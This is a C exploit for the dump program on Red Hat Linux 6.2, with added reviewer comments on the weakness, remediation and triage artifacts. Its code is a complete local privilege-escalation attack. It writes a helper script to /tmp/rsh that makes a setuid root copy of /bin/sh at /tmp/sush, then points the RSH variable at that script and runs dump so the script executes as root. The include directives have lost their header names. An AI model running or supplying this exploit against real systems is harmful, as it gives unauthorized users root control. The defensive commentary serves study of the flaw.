/*
 * dump-0.4b15-1 exploit for linux redhat 6.2
 *
 * dump executing a user editable environment setting that runs a file
 * without dropping root privileges, thus making the spawn of a root shell
 * possible.
 *
 * bug discovered by: mat
 * exploit code by: The Itch / BsE
 *
 * P.S.: mind the dumb coding, its my first exploit and im still learning
 *
 * shouts go out to: Xistence, C-murdah, dystopia, Pyra, Zer0, Wildcoyote,
 * lucipher, Tozz Shadowlady, Dilusi0n, Calimonk, s0k, Script0r and the rest
 * of Ph33r the B33r
 *
 * Reviewer notes (defensive reading of this listing):
 *
 * - Weakness class: a privileged program takes the path of a helper
 *   executable from a caller-controlled environment variable (RSH here) and
 *   runs it while still holding elevated privileges. The header above states
 *   that dump does not drop root before running that file; this listing does
 *   not show dump's own code, and it presumes dump is installed set-uid root
 *   on the affected release -- confirm per host.
 * - Remediation pattern: the privileged program must drop its elevated IDs
 *   (or ignore / sanitize the variable) before exec'ing any helper. Where a
 *   fixed package is not available, removing the set-uid bit from dump
 *   closes this path for unprivileged callers.
 * - Artifacts this listing leaves behind, useful for triage: a shell script
 *   at TMP (/tmp/rsh) and a root-owned mode-4755 copy of /bin/sh at
 *   ROOTSHELL (/tmp/sush). Set-uid root files under world-writable
 *   directories are a high-signal finding in a periodic set-uid audit.
 * - Mounting /tmp with nosuid neutralizes the set-uid copy placed there, but
 *   not the underlying flaw: the helper script is still run with whatever
 *   privileges dump holds at that point.
 */

/* Header names were lost when the page was extracted (the angle-bracket
 * text was stripped); the directives are left exactly as found. */
#include
#include
#include

/* Path of the dump binary under test. */
#define DUMP "/sbin/dump"
/* Path of the helper script that RSH is pointed at. */
#define TMP "/tmp/rsh"
/* Path of the set-uid shell copy the helper script creates. */
#define ROOTSHELL "/tmp/sush"

// if you changed #define TMP then change the path of the CHATTRIB too
#define CHATTRIB "chmod 755 /tmp/rsh"

// if you changed the path of dump in #define DUMP then change the
// path of #define RUNDUMP too
#define RUNDUMP "/sbin/dump -0 /"

/*
 * Flow, as written below:
 *   1. Print a banner and check that DUMP can be opened for reading.
 *   2. Write a four-line /bin/sh script to TMP and make it executable.
 *   3. Set TAPE and RSH in the environment, then run RUNDUMP via system().
 *
 * Returns 0 on every path, including the early exit when DUMP cannot be
 * opened, so the exit status says nothing about the outcome.
 */
int main()
{
	FILE *rshfile;
	FILE *dumpfile;

	printf("\n* Dump exploit for linux redhat 6.2\n");
	printf("* Bug discovered by Mat \n");
	printf("* Exploit coded by The Itch / BsE\n\n");

	/* Existence/readability probe only; the handle is closed unused. */
	dumpfile = fopen(DUMP, "r");
	if(!dumpfile)
	{
		printf("\n%s not found or is not world readable/executable!!\n\n", DUMP);
		exit(0);
	}
	fclose(dumpfile);

	/* Helper script body: copies /bin/sh to ROOTSHELL, chowns it to root
	 * and sets mode 4755. These three commands only succeed in producing a
	 * set-uid root file if the script itself is executed as root, which is
	 * the privilege-retention flaw the header describes. */
	rshfile = fopen(TMP, "w");
	fprintf(rshfile, "#!/bin/sh\n");
	fprintf(rshfile, "cp /bin/sh %s\n", ROOTSHELL);
	fprintf(rshfile, "chown root.root %s\n", ROOTSHELL);
	fprintf(rshfile, "chmod 4755 %s\n", ROOTSHELL);
	fclose(rshfile);

	/* chmod 755 on the helper script so it can be exec'd. */
	system(CHATTRIB);

	printf("Invoking vulnerable program %s\n", DUMP);
	printf("Ignore the garbage....\n\n");

	/* TAPE is given a "host:device" shaped value and RSH names the helper
	 * script. NOTE(review): presumably the host:device form is what makes
	 * dump take its remote-tape path and consult RSH -- inferred from the
	 * values used here, not shown in this listing. A non-root process
	 * starting dump with RSH set to a path in a world-writable directory is
	 * the behaviour to alert on. */
	putenv("TAPE=garbage:garbage");
	setenv("RSH", TMP, 1);
	system(RUNDUMP);

	printf("\n\nif all went well, a rootshell awaits you in %s\n\n",ROOTSHELL);
	return 0;
}

/* Remember, there's no cure for BsE */